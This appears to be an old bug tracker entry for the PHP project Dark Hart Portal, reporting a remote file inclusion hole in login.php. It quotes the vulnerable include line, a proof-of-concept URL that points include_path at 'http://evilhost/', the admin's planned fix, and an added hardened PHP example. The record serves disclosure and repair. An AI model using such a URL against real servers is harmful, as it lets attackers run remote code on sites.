Dark Hart Portal

Tracker: Bugs

9 serious security flaws - ID: 440666
Last Update: Comment added ( webmosher )

e.g., login.php contains the following line:
include("$include_path/plugins/$plugin/function.php");

The $include_path can be set by anyone:
http://foo/login.php?mainfile=1&include_path=http://evilhost/

This exploit works on the demo site.


Submitted: Nobody/Anonymous ( nobody ) - 2001-07-12 13:35
Priority: 9
Status: Closed
Resolution: Later
Assigned: Fred Hirsch
Category: Core Features
Group: Alpha Development
Visibility: Public


Comment ( 1 )




Date: 2001-07-16 13:12
Sender: webmosher (Project Admin)

Logged In: YES
user_id=157247

Thanks for finding this issue. I am working on this right
now. It seems to be an artifact of using the old PHPNuke
system of including the primary function library. Fix will
be to use include_once and remove the mainfile variable. I
will also explicitly unset any variables that are utilized
globally in the primary methods.
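
The include pattern from the report next to one hardened form, as an added PHP example that is not Dark Hart Portal's code and goes somewhat beyond the fix described in the comment: the include base is fixed by the application and the plugin name is validated before include_once. The function name resolve_plugin_file, the constant DHP_INCLUDE_PATH and the temporary fixture are assumptions made for illustration.

```php
<?php
// Added example, not Dark Hart Portal code. All names below are hypothetical.

// Vulnerable pattern from the report (kept as a comment, not executed):
//   include("$include_path/plugins/$plugin/function.php");
// With register_globals on, $include_path and $plugin can be set from the query string.

// Hardened form: base path fixed in code, plugin name validated, result contained.
function resolve_plugin_file(string $baseDir, string $plugin): ?string
{
    // Accept only a simple identifier: no slashes, dots, URL schemes or NUL bytes.
    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $plugin)) {
        return null;
    }
    $base = realpath($baseDir . '/plugins');
    $file = realpath($baseDir . "/plugins/$plugin/function.php");
    if ($base === false || $file === false) {
        return null; // plugin directory or file does not exist
    }
    // Containment check: the resolved file must live under the plugins directory.
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Constructed fixture so the example runs offline.
$root = sys_get_temp_dir() . '/dhp_example_' . getmypid();
mkdir("$root/plugins/news", 0700, true);
file_put_contents("$root/plugins/news/function.php",
    "<?php function news_loaded() { return true; }\n");

// The base directory is a constant set by the application, never by the request.
define('DHP_INCLUDE_PATH', $root);

// Constructed values standing in for what a request could supply as the plugin name.
$candidates = ['news', 'http://evilhost/', '../../etc', 'missing'];
foreach ($candidates as $plugin) {
    $file = resolve_plugin_file(DHP_INCLUDE_PATH, $plugin);
    if ($file !== null) {
        include_once $file;
        echo "loaded:   $plugin\n";
    } else {
        echo "rejected: $plugin\n";
    }
}
```

Only the first candidate is loaded; the other three are rejected before any include is attempted.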



Attached File

No Files Currently Attached

Changes ( 7 )

Field Old Value Date By
status_id Open 2001-07-16 13:12 webmosher
resolution_id None 2001-07-16 13:12 webmosher
category_id None 2001-07-16 13:12 webmosher
artifact_group_id None 2001-07-16 13:12 webmosher
priority 5 2001-07-16 13:12 webmosher
assigned_to nobody 2001-07-16 13:12 webmosher
close_date - 2001-07-16 13:12 webmosher